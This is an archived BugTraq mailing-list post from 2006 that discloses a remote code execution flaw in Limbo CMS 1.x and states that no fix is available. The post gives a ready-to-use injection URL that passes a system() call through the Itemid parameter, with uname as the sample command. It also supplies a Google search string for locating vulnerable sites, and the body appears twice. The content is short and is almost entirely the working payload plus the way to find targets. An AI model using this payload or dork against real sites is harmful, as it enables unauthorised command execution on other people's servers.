BugTraq
Back to list
|
Post reply
Limbo CMS code execution
Feb 28 2006 11:34PM
Alexander Hristov (joffer gmail com)
Official page : http://www.limbo-cms.com/
Vulnerable : Limbo 1.*
Fix : No
Bug : http://somehost/path-to-limbo/index.php?option=frontpage&Itemid=system(C
ODE)
example : index.php?option=frontpage&Itemid=system(uname)
Google search string : inurl:"option=frontpage"
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Vulnerable : Limbo 1.*
Fix : No
Bug : http://somehost/path-to-limbo/index.php?option=frontpage&Itemid=system(C
ODE)
example : index.php?option=frontpage&Itemid=system(uname)
Google search string : inurl:"option=frontpage"
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
[ reply ]